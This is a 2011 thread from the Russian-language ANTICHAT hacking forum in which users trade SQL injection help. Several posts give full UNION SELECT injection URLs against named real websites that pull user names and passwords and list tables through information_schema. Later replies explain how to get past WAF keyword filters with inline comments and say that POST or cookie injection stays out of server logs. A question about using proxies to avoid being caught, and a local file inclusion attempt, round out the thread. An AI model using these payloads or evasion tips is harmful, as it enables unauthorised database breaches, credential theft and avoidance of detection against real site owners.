ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
17.05.2011, 02:39
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Osstudio
Osstudio said:
Что не так??
во первых синтаксетическая ошибка:
group_concat(concat_ws( 0x3a3a3a,user_name,pass)+separator+0x0b)
а должно быть:
group_concat(concat_ws( 0x3a,user_name,pass)+separator+0x0b)
во вторых, там таблица пустая!!!
а вообще для примера по твоей уязвимости вот пример вывода:
Сообщение от None
http://www.ecom-info.spb.ru/news/index.php?id=1233+and+1=0+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,group_concat%28concat_ws(0x3a,r eg_ip)+separator+0x0b%29,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31,32,33,34,35+from+subscri be_emails+limit+0,20--
|
|
|
17.05.2011, 02:59
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от Osstudio
Osstudio said:
И почему в 4 версии не поддерживается table_schema?!
Как можно ещё?
table_schema
http://www.laitkipers.ru/news.php?id=40+and+1=0+union+select+1,group_concat %28table_name+separator+0x3a%29,3,4,5,6+from+infor mation_schema.tables+where+table_schema=0x636F6E63 6F7264345F6C6169746B6970657273--
тут маленькая поправочку про коментирую, правильно не table_schema , а information_schema
дальше, вот что говорит один из справочников:
цитата:
В MySQL версии 5.0 и выше есть база INFORMATION_SCHEMA. Это виртуальная база (не хранится в виде файлов, а формируется во время запуска сервера), содержащая метаданные баз данных, т.е. информацию о структуре баз данных. Доступна только для чтения.
полностью о information_schema сможешь прочитать здесь:
Сообщение от None
http://webew.ru/articles/200.webew
а об альтернативе запроса тебе уже постом выше привели пример:
Сообщение от Konqi
Konqi said:
http://www.laitkipers.ru/news.php?id=40+and+false+union+select+1,unhex(hex( concat(user_name,0x3a,user_pass))),3,4,5,6+from+us er--+
и еще, дополнительно, mysql 4
|
|
|
|
17.05.2011, 04:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
1531
Репутация:
0
|
|
Сообщение от winstrool
winstrool said:
во первых синтаксетическая ошибка:
group_concat(concat_ws(
0x3a3a3a
,user_name,pass)+separator+0x0b)
а должно быть:
group_concat(concat_ws(
0x3a
,user_name,pass)+separator+0x0b)
0x3a3a3a = :::
0x3a = :
Это не синтаксическая ошибка.
|
|
|
|
17.05.2011, 14:28
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
winstrool
Ты только вчера спрашивал как вывести список таблиц в 4ой версии,а сейчас уже отвечаешь на вопросы людей?
1. 0x3a3a3a - это синтаксическая ошибка? Открой свой любимый манул на MySQL и прочитай про эту ф-цию. Первым аргументом она приминает разделитель, можно написать concat_ws(':',a,b,c), но вариант не 100% т.к. много где используется magic_quotes, а 0x3a это : в кодировке HEX. Ты можешь туда что угодно написать, любой сделать разделитель.
2. К чему твоя "поправочка"? Человек все правильно выводит из таблицы information_schema при условии что table_schema (БД в которой находится таблица)=нужной ему.
|
|
|
|
18.05.2011, 11:53
|
|
Новичок
Регистрация: 16.12.2008
Сообщений: 2
Провел на форуме:
17542
Репутация:
0
|
|
Sql Injection
Такой вопрос.
Запрос типа: newsid=-1+union+/*!select*/+1,concat%28version%28%29,0x3a,user%28%29,0x3a,dat abase%28%29%29,3,4,5,6,7,8
у меня проходит. Версия базы 5-я. Но дело в том, что на сайте стоит жесткая фильтрация и если вписать просто select без /*!*/ то выдает ошибку: "An appropriate representation of the requested resource / could not be found on this server.". Проблема такая. Когда я пишу слово table_name в любом запросе, то выходит опять ошибка: "An appropriate representation.... Как я понимаю, он фильтрует и слова определенные. Как обойти эту фильтрацию?
|
|
|
|
18.05.2011, 13:37
|
|
Guest
Сообщений: n/a
Провел на форуме:
55038
Репутация:
0
|
|
Ребят,возможно вопрос не в тему,но все же.Вот при раскрутки скули сильно ли палишься?надо юзать прокси или что нибудь еще?И что за это может быть?Помогите новичку)
|
|
|
|
18.05.2011, 13:51
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от Savage Boy
Savage Boy said:
Такой вопрос.
Запрос типа: newsid=-1+union+/*!select*/+1,concat%28version%28%29,0x3a,user%28%29,0x3a,dat abase%28%29%29,3,4,5,6,7,8
у меня проходит. Версия базы 5-я. Но дело в том, что на сайте стоит жесткая фильтрация и если вписать просто select без /*!*/ то выдает ошибку: "An appropriate representation of the requested resource / could not be found on this server.". Проблема такая. Когда я пишу слово table_name в любом запросе, то выходит опять ошибка: "An appropriate representation.... Как я понимаю, он фильтрует и слова определенные. Как обойти эту фильтрацию?
Это называется WAF. Ищи в гугле способы обхода WAF. Я не думаю, что фильтруется table_name. Скорее всего FROM, либо таблица INFORMATION_SCHEMA. Это можно обойти так же комментариями, но не всегда. Впиши просто в запрос: id=1+union \ select \ table_name \ from и т.д., чтобы узнать что из этого фильтруется.
Сообщение от MTV
MTV said:
Ребят,возможно вопрос не в тему,но все же.Вот при раскрутки скули сильно ли палишься?надо юзать прокси или что нибудь еще?И что за это может быть?Помогите новичку)
Когда SQLi в GET-параметрах - палится легко, ты жестко следишь в логах, в POST или же COOKIE - нет, эти запросы в логи не попадают.
А на счет безопасности тебе в соответствующий раздел читать статьи.
|
|
|
|
18.05.2011, 13:59
|
|
Новичок
Регистрация: 07.05.2009
Сообщений: 20
Провел на форуме:
86381
Репутация:
16
|
|
Нашел local include. При попытке подняться из домашней директории юзверя и подценить какой-нибудь лог и т.д. Получаю: Method Not Implemented. GET to /index.php not supported.
В чем подвох? Как-то хитро настроено серверное ПО?
|
|
|
|
18.05.2011, 14:06
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от ta-kyn
ta-kyn said:
Нашел local include. При попытке подняться из домашней директории юзверя и подценить какой-нибудь лог и т.д. Получаю:
Method Not Implemented. GET to /index.php not supported.
В чем подвох? Как-то хитро настроено серверное ПО?
На сервере стоит Mod Security, который не позволяет выполнять твои запросы.
|
|
|
|
18.05.2011, 14:41
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
ta-kyn
линк сюда скинь
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
